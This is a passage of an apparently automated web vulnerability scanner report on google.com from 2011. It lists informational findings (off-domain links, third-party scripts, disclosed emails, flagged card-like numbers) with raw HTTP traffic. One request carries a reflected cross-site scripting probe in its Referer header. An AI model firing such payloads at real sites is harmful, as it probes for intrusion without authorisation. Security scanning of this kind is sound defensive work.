- http://www.reuters.com/article/2011/12/06/us-markets-global-idUSTRE7B42IW20111206
- http://www.youtube.com/?tab=e1
Request
GET /finance?tab=we HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Dec 2011 07:31:26 GMT Expires: Tue, 06 Dec 2011 07:31:26 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=void 0!=b?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/?tab=e1" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]... <span class=name> <a href="http://www.reuters.com/article/2011/12/06/us-markets-global-idUSTRE7B42IW20111206" rel=nofollow id=n-hp- >Asian stocks fall after S&P downgrade warning</a> ...[SNIP]... <div class=rel-article> <a href="http://www.bloomberg.com/news/2011-12-06/asia-stocks-drop-on-europe-concern.html" rel=nofollow id=n-hp- >Asia Stocks Drop on Europe Concern</a> ...[SNIP]... <div class=rel-article> <a href="http://abcnews.go.com/Business/wireStory/asia-stocks-fall-sp-warns-euro-nations-15092656" rel=nofollow id=n-hp- >Asia Stocks Fall as S&P Warns Euro Nations on Debt</a> ...[SNIP]... <span class=byline> <a href="http://www.marketwatch.com/story/asia-edges-lower-after-sps-europe-move-2011-12-05?link=MW_popular" rel=nofollow class=rel id=n-hp- >MarketWatch</a> <a href="http://www.freep.com/article/20111206/BUSINESS07/112060337/S-P-threatens-to-downgrade-ratings-of-15-eurozone-countries" rel=nofollow class=rel id=n-hp- >Detroit Free Press</a> ...[SNIP]... <div> <a class=title href="http://www.reuters.com/article/2011/12/06/us-eurozone-idUSTRE7B30AO20111206" rel=nofollow id=n-hp- >S&P piles pressure on EU budget plan</a> ...[SNIP]... <div> <a class=title href="http://www.freep.com/article/20111206/NEWS07/112060373/Slower-snail-mail-poses-threat-to-small-businesses-Netflix-subscribers" rel=nofollow id=n-hp- >Slower snail mail poses threat to small businesses, Netflix subscribers</a> ...[SNIP]... <div> <a class=title href="http://www.bloomberg.com/news/2011-12-06/olympus-management-rotten-to-the-core-panel.html" rel=nofollow id=n-hp- >Probe Finds Olympus Management 'Rotten to the Core'</a> ...[SNIP]... <div> <a class=title href="http://www.businessweek.com/news/2011-12-05/bp-says-halliburton-destroyed-evidence-in-gulf-spill-case.html" rel=nofollow id=n-hp- >BP Says Halliburton Destroyed Evidence in Gulf Spill Case</a> ...[SNIP]... <div> <a class=title href="http://economictimes.indiatimes.com/news/news-by-industry/services/retailing/fdi-in-india-debate-rages-in-india-over-allowing-wal-marts/articleshow/11004160.cms" rel=nofollow id=n-hp- >FDI in India: Debate rages in India over allowing Wal-Marts</a> ...[SNIP]... </a> - <a href="http://www.google.ca/finance" class="fjfe-edition-link">Canada</a> ...[SNIP]... </a> - <a href="http://googlefinanceblog.blogspot.com">Blog</a> ...[SNIP]...
|
5.4. http://www.google.com/imghp
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/imghp |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/imghp?hl=en&tab=wi
The response contains the following link to another domain:- http://www.youtube.com/?hl=en&tab=i1
Request
GET /imghp?hl=en&tab=wi HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:21 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=21cb6a100f3e34c2:FF=0:TM=1323156681:LM=1323156681:S=_DrZ-8ZvxMEWwyyl; expires=Thu, 05-Dec-2013 07:31:21 GMT; path=/; domain=.google.com Set-Cookie: NID=53=h87leIWWYCVGrwNQAaH2YotTJ--EyzUtlOvr8VaHCo4Wc2NQR24Q_p17-v9mPS5F2LAD1Ynn0eYqHONv2YmMNV0a1AsvEykQuccJO0q7tD-7oGr0T2S5qaP0s4UfP0dR; expires=Wed, 06-Jun-2012 07:31:21 GMT; path=/; domain=.google.com; HttpOnly Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Google Images. The most comprehensive image search on the web."><title>G ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/?hl=en&tab=i1" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]...
|
5.5. http://www.google.com/prdhp
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/prdhp |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/prdhp?hl=en&tab=wf
The response contains the following links to other domains:- http://googlecommerce.blogspot.com/
- http://www.youtube.com/?hl=en&tab=f1
Request
GET /prdhp?hl=en&tab=wf HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: none Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Dec 2011 07:31:23 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="gwt:property" content="locale=en_US"> <meta name="com.google.commerce.gwtfe.shoppingassistant ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/?hl=en&tab=f1" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]... </a> <a href="http://googlecommerce.blogspot.com/">Google Commerce Blog</a> ...[SNIP]...
|
5.6. http://www.google.com/preferences
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/preferences |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/preferences?hl=en
The response contains the following link to another domain:- http://www.youtube.com/?hl=en&tab=w1
Request
GET /preferences?hl=en HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=86f3e7dcdee5e4ad:FF=0:TM=1323156679:LM=1323156679:S=fJgWhieJ-IAkunkR; expires=Thu, 05-Dec-2013 07:31:19 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Preferences</title><style>body,td,div,.p,a{font-family:arial,sans-serif}.ts{border-collapse:collaps ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/?hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]...
|
5.7. http://www.google.com/support/accounts/bin/answer.py
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/support/accounts/bin/answer.py |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/support/accounts/bin/answer.py?answer=27444&hl=en&ctx=ch_ServiceLoginAuth&p=recaptcha
The response contains the following links to other domains:- http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D27444%26ctx%3Dshare&tt=Password
- http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D27444%26ctx%3Dshare&n=Password
- http://www.google-analytics.com/ga.js
- http://www.youtube.com/
- http://www.youtube.com/GoogleAccountsHelp
Request
GET /support/accounts/bin/answer.py?answer=27444&hl=en&ctx=ch_ServiceLoginAuth&p=recaptcha HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Set-Cookie: N_T=sess%3D742cbbb370cc7d57%26v%3D2%26c%3Dd071389a%26s%3D4eddc4b3%26t%3DA%3A0%3A27444%26sessref%3D%2523recaptcha; Expires=Tue, 06-Dec-2011 08:00:59 GMT; Path=/support; HttpOnly Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Dec 2011 07:30:59 GMT Expires: Tue, 06 Dec 2011 07:30:59 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <pre style="font-size: 0;display: none;visibility: hidden;">
</pre> <html lang="en" class=""> <head> <scrip ...[SNIP]... </script> <script src='//www.google-analytics.com/ga.js' type='text/javascript'></script> ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]... <li style="background-image:url(//www.google.com/images/icons/product/blogger-16.png);"> <a href="http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D27444%26ctx%3Dshare&n=Password" onclick="track('Page Actions', 'Share - Blogger')" target="_blank">Blogger</a> ...[SNIP]... <li style="background-image:url(//www.google.com/images/icons/product/orkut-16.png);"> <a href="http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D27444%26ctx%3Dshare&tt=Password" onclick="track('Page Actions', 'Share - Orkut')" target="_blank">Orkut</a> ...[SNIP]... <li style="background-image:url(//www.google.com/images/icons/youtube-32.gif)" class="combo-mod-item "> <a href="http://www.youtube.com/GoogleAccountsHelp" onclick="track('Combo Module', 'video_youtube');">Video tutorials</a> ...[SNIP]...
|
5.8. http://www.google.com/support/accounts/bin/answer.py
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/support/accounts/bin/answer.py |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/support/accounts/bin/answer.py?answer=181692&hl=en
The response contains the following links to other domains:- http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D181692%26ctx%3Dshare&tt=Data+access+by+your+administrator
- http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D181692%26ctx%3Dshare&n=Data+access+by+your+administrator
- http://www.google-analytics.com/ga.js
- http://www.youtube.com/
- http://www.youtube.com/GoogleAccountsHelp
- http://www.youtube.com/v/S5JVOpM41qU?fs=1&hl=en_US&rel=0
Request
GET /support/accounts/bin/answer.py?answer=181692&hl=en HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Set-Cookie: N_T=sess%3D161b2d6c226203e2%26v%3D2%26c%3D38c8bc4f%26s%3D4eddc4b4%26t%3DA%3A0%3A181692%26sessref%3D; Expires=Tue, 06-Dec-2011 08:01:00 GMT; Path=/support; HttpOnly Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Dec 2011 07:31:01 GMT Expires: Tue, 06 Dec 2011 07:31:01 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <pre style="font-size: 0;display: none;visibility: hidden;">
</pre> <html lang="en" class=""> <head> <scrip ...[SNIP]... </script> <script src='//www.google-analytics.com/ga.js' type='text/javascript'></script> ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]... <param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/S5JVOpM41qU?fs=1&hl=en_US&rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></object> ...[SNIP]... <li style="background-image:url(//www.google.com/images/icons/product/blogger-16.png);"> <a href="http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D181692%26ctx%3Dshare&n=Data+access+by+your+administrator" onclick="track('Page Actions', 'Share - Blogger')" target="_blank">Blogger</a> ...[SNIP]... <li style="background-image:url(//www.google.com/images/icons/product/orkut-16.png);"> <a href="http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D181692%26ctx%3Dshare&tt=Data+access+by+your+administrator" onclick="track('Page Actions', 'Share - Orkut')" target="_blank">Orkut</a> ...[SNIP]... <li style="background-image:url(//www.google.com/images/icons/youtube-32.gif)" class="combo-mod-item "> <a href="http://www.youtube.com/GoogleAccountsHelp" onclick="track('Combo Module', 'video_youtube');">Video tutorials</a> ...[SNIP]...
|
5.9. http://www.google.com/support/accounts/bin/answer.py
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/support/accounts/bin/answer.py |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/support/accounts/bin/answer.py?answer=33974
The response contains the following links to other domains:- http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D33974%26ctx%3Dshare&tt=Problems+with+the+audio+number+verification
- http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D33974%26ctx%3Dshare&n=Problems+with+the+audio+number+verification
- http://www.google-analytics.com/ga.js
- http://www.youtube.com/
- http://www.youtube.com/GoogleAccountsHelp
Request
GET /support/accounts/bin/answer.py?answer=33974 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Set-Cookie: N_T=sess%3D5f18409c19f9233e%26v%3D2%26c%3Dcc71def3%26s%3D4eddc4b4%26t%3DA%3A0%3A33974%26sessref%3D; Expires=Tue, 06-Dec-2011 08:01:00 GMT; Path=/support; HttpOnly Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Dec 2011 07:31:00 GMT Expires: Tue, 06 Dec 2011 07:31:00 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <pre style="font-size: 0;display: none;visibility: hidden;">
</pre> <html lang="en" class=""> <head> <scrip ...[SNIP]... </script> <script src='//www.google-analytics.com/ga.js' type='text/javascript'></script> ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]... <li style="background-image:url(//www.google.com/images/icons/product/blogger-16.png);"> <a href="http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D33974%26ctx%3Dshare&n=Problems+with+the+audio+number+verification" onclick="track('Page Actions', 'Share - Blogger')" target="_blank">Blogger</a> ...[SNIP]... <li style="background-image:url(//www.google.com/images/icons/product/orkut-16.png);"> <a href="http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Faccounts%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D33974%26ctx%3Dshare&tt=Problems+with+the+audio+number+verification" onclick="track('Page Actions', 'Share - Orkut')" target="_blank">Orkut</a> ...[SNIP]... <li style="background-image:url(//www.google.com/images/icons/youtube-32.gif)" class="combo-mod-item "> <a href="http://www.youtube.com/GoogleAccountsHelp" onclick="track('Combo Module', 'video_youtube');">Video tutorials</a> ...[SNIP]...
|
5.10. http://www.google.com/webhp
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/webhp |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/webhp?hl=en
The response contains the following link to another domain:- http://www.youtube.com/?hl=en&tab=w1
Request
GET /webhp?hl=en HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:20 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=0daa4ae4c8d921e3:FF=0:TM=1323156680:LM=1323156680:S=H2pPv_tLbsy8BKpP; expires=Thu, 05-Dec-2013 07:31:20 GMT; path=/; domain=.google.com Set-Cookie: NID=53=UuEDfMy3Cd4sIAmfbwvraskC4jj0HNODLJ2rAGAg5WjNKXVv9_AAywD4u1fx0iVxDJ8DkHrmGzMYB_soHBRgWDAGYQb7PjWGf1VgeC03dbEzXajQ4CzXOmWChOVOivkY; expires=Wed, 06-Jun-2012 07:31:20 GMT; path=/; domain=.google.com; HttpOnly Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world's information, including webpages, images, videos a ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/?hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]...
|
6. Cross-domain script include
previous
next
There are 3 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
6.1. http://www.google.com/accounts/TOS
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/accounts/TOS |
Issue detail
The response dynamically includes the following script from another domain:- https://ssl.google-analytics.com/urchin.js
Request
GET /accounts/TOS HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Cache-control: no-cache, no-store Pragma: no-cache Expires: Mon, 01-Jan-1990 00:00:00 GMT Date: Tue, 06 Dec 2011 07:31:04 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close Content-Length: 45211
<html><head><title>Google Terms of Service</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <style type="text/css"> body,td,div,p,a,font,span{font-family:arial,sans-seri ...[SNIP]... <link href="//www.google.com/accounts/google.css" rel="stylesheet"> <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script> ...[SNIP]...
|
6.2. http://www.google.com/support/accounts/bin/answer.py
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/support/accounts/bin/answer.py |
Issue detail
The response dynamically includes the following script from another domain:- http://www.google-analytics.com/ga.js
Request
GET /support/accounts/bin/answer.py?answer=27444&hl=en&ctx=ch_ServiceLoginAuth&p=recaptcha HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Set-Cookie: N_T=sess%3D742cbbb370cc7d57%26v%3D2%26c%3Dd071389a%26s%3D4eddc4b3%26t%3DA%3A0%3A27444%26sessref%3D%2523recaptcha; Expires=Tue, 06-Dec-2011 08:00:59 GMT; Path=/support; HttpOnly Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Dec 2011 07:30:59 GMT Expires: Tue, 06 Dec 2011 07:30:59 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <pre style="font-size: 0;display: none;visibility: hidden;">
</pre> <html lang="en" class=""> <head> <scrip ...[SNIP]... </script> <script src='//www.google-analytics.com/ga.js' type='text/javascript'></script> ...[SNIP]...
|
6.3. http://www.google.com/webelements/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/webelements/ |
Issue detail
The response dynamically includes the following scripts from other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
- http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js
- http://gmodules.com/gadgets/js/rpc.js
Request
GET /webelements/ HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html Expires: Fri, 01 Jan 1990 00:00:00 GMT Vary: Accept-Encoding Date: Tue, 06 Dec 2011 07:31:17 GMT Server: Google Frontend Connection: close
<!DOCTYPE html> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Google Web Elements</title> <script type="text/javascript" src="/webelements/js/c ...[SNIP]... </script> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script> ...[SNIP]... </script> <script type="text/javascript" src="//gmodules.com/gadgets/js/rpc.js"></script> ...[SNIP]...
|
7. Email addresses disclosed
previous
next
There are 2 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
7.1. http://www.google.com/recaptcha/learnmore
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/recaptcha/learnmore |
Issue detail
The following email address was disclosed in the response:
Request
GET /recaptcha/learnmore HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com/recaptcha/help?c=246f4%27%3E%3Cscript%3Ealert(1)%3C/script%3Ed60cda5d2ef Cookie: PREF=ID=810b7e02f363f054:FF=0:TM=1323101452:LM=1323101452:S=YE3SrEw60NXiwZZo; NID=53=aFV4Q7lzlA4g6hZ9Rki3DYK8hz1kGzocOZJI_w6eu6JH96dgw9nfloRt3_epIdfu1eIfKEVGXPRaSeg1Gk3GPPiFOlJXq1zd78kLwVzQe98Ltf17rS5LHcjEaSV7RjqH
|
Response
HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Dec 2011 06:33:11 GMT Expires: Tue, 06 Dec 2011 06:33:11 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Content-Length: 8021 Server: GSE
<html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link rel="stylesheet" href="/recaptcha/static/shared-media/styles.css" type="text/css"> <title>What is reCAPTCHA?< ...[SNIP]... </a> allows you to safely post your email address on the web. Mailhide takes an address such as jsmith@example.com and turns it into jsm<a href="http://www.google.com/recaptcha/mailhide/d?k=01Xk_-qOcMGZ2_GJpKQjfZbw==&c=WR3ESkXsL3etK7BMCCPElcgZZPmsJxwvfXJc5nicQtQ=" onclick="window.open('http://www.google.co ...[SNIP]...
|
7.2. http://www.google.com/webelements/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/webelements/ |
Issue detail
The following email addresses were disclosed in the response:- googlegroups-announce@googlegroups.com
- usa__en@holiday.calendar.google.com
Request
GET /webelements/ HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html Expires: Fri, 01 Jan 1990 00:00:00 GMT Vary: Accept-Encoding Date: Tue, 06 Dec 2011 07:31:17 GMT Server: Google Frontend Connection: close
<!DOCTYPE html> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Google Web Elements</title> <script type="text/javascript" src="/webelements/js/c ...[SNIP]... <span class="indentedtext128 gray">Example: usa__en@holiday.calendar.google.com</span> ...[SNIP]... <br/> For example: googlegroups-announce@googlegroups.com or https://groups.google.com/group/googlegroups-announce </span> ...[SNIP]...
|
8. Credit card numbers disclosed
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/recaptcha/static/reCAPTCHA_Science.pdf |
Issue detail
The following credit card numbers were disclosed in the response:- 4686145004373540
- 5565565560333500
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
Request
GET /recaptcha/static/reCAPTCHA_Science.pdf HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Content-Type: application/pdf Expires: Tue, 06 Dec 2011 08:30:43 GMT Date: Tue, 06 Dec 2011 07:30:43 GMT Last-Modified: Fri, 16 Sep 2011 15:02:11 GMT Content-Disposition: Attachment X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=3600 Content-Length: 153370 Age: 1 Connection: close
%PDF-1.6%.... 33 0 obj<</Linearized 1/L 153370/O 36/E 63178/N 4/T 152663/H [ 1696 465]>>endobj xref 33 70 0000000016 00000 n 0000002161 00000 n 0000002240 00000 n 0000002365 ...[SNIP]... 78 556 556 556 556 556 556 556 556 556 556 278 278 0 0 0 0 0 667 0 722 722 0 0 0 0 278 0 0 556 833 722 778 0 0 0 667 611 0 0 944 0 667 0 0 0 0 0 556 0 556 556 500 556 556 278 556 556 222 0 500 222 833 556 556 556 0 333 500 278 556 500 722 500 500]/BaseFont/CPPFMK+ArialMT/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font> ...[SNIP]... </Subtype/Type1/FontDescriptor 16 0 R/LastChar 121/Widths[250 0 0 500 0 0 500 0 0 500 0 0 0 0 0 0 0 0 0 479 510 479 583 447 427 552 583 250 270 0 385 677 604 614 468 614 500 437 354 0 500 0 0 0 0 0 0 0 0 0 0 479 0 395 479 416 250 479 489 239 0 0 239 718 489 479 479 0 312 343 281 479 395 0 0 395]/BaseFont/CPPGEA+AdvTT66ad9447.I/FirstChar 46/ToUnicode 17 0 R/Encoding 18 0 R/Type/Font ...[SNIP]...
|
9. HTML does not specify charset
previous
There are 7 instances of this issue:
Issue description
